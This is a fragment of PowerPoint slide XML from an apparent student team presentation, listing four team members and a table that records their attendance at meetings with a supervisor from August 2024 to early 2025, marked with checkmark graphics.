            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800" b="1"/>
              <a:t>Team Members:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1.Amal</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800">
              <a:ea typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2.Sreeraj</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800">
              <a:ea typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3.Raiyan</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800">
              <a:ea typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>4.Haziq</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800">
              <a:ea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a:xfrm>
            <a:off x="2205037" y="786565"/>
            <a:ext cx="7781925" cy="604837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Records of Team Meetings with Supervisor</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US"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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2024213" y="2223298"/>
          <a:ext cx="7871628" cy="3233358"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="969879">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1517923283"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="604445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1318809607"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="711692378"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2614220561"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1948626200"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2795199394"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2901416672"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1682421763"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3417780948"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="787163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3201849154"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1006886">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" dirty="0"/>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800"/>
                        <a:t>16/8/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800"/>
                        <a:t>23/10/24</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-SG" sz="1800" baseline="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800"/>
                        <a:t>30/10/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800"/>
                        <a:t>26/11/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800"/>
                        <a:t>13/12/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>26/12/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>8/1/25</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>14/1/25</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>5/2/24</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1425373661"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="704825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" i="1" dirty="0" err="1"/>
                        <a:t>Raiyan</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-SG" sz="1800" i="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-SG" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRPr>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1011384423"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="704825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="1800" i="1"/>
                        <a:t>Sreeraj</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:prstClr val="black"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRPr>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="215251939"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4084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i="1"/>
                        <a:t>Haziq</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:prstClr val="black"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRPr>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="443486243"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4084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i="1"/>
                        <a:t>Amal</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:prstClr val="black"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-SG" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRPr>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endParaRPr lang="en-SG" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45728" marB="45728"/>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a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-SG" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45727" marB="45727"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3745109648"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20471245-D60B-BD10-AF89-E3DAFB2F6C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641" y="3429353"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90384E11-6103-9E59-F037-D7EEF4FC5A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9559" y="4111268"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{865C291E-226E-517F-4834-67F91EB9F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641" y="4635521"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72F2714-3163-455A-4FEB-CCE7A8D620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641" y="5079110"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD40BBA-14D4-13A5-1908-9A15FE16A4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1843" y="3381744"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B606B69-C59C-1E45-E927-19A29C54E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4260" y="4075841"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703E73A7-4625-49A7-08DB-2EDAC26F0E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8342" y="5089763"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50537FD-A285-54E0-F271-A4F09488D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9558" y="3330901"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930297E8-411A-A103-257D-9F1D949BDA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7098" y="4108929"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Graphic 12" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99274E2C-7E06-513E-6F99-1DC316B308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2887" y="4676623"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D639092-C9D0-BF1D-F4DD-900CADBCA2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2887" y="5079110"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Graphic 2" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D059B925-43CE-5AAB-C45D-07B8B9B819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5225" y="4646929"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic 15" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE81671A-BB11-3035-45DA-520455D29F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5079" y="3437766"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A73D57-5C01-AFC2-2CF0-527AA12D6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8295" y="4136786"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0690CDD9-D4FF-497A-9F0E-6C2B0A47F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6688" y="4672728"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphic 18" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D5143D-79A1-30E3-0111-2BAF5B9E39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7119" y="5054379"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphic 19" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE41C7D0-861F-98B3-5ED6-BB4D8AFD2D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8163" y="3404371"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 20" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327A1131-F1F2-ABC8-3622-A803E36D2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9981" y="4115181"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B5760-8AE5-E35C-E492-48FFA0E732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9509" y="5053583"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A186A66-BCAD-7638-84F7-DAFEFFECE8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2737" y="3457641"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5FD26D-6EAC-295D-6167-9639C2E7AE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7931" y="4136786"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
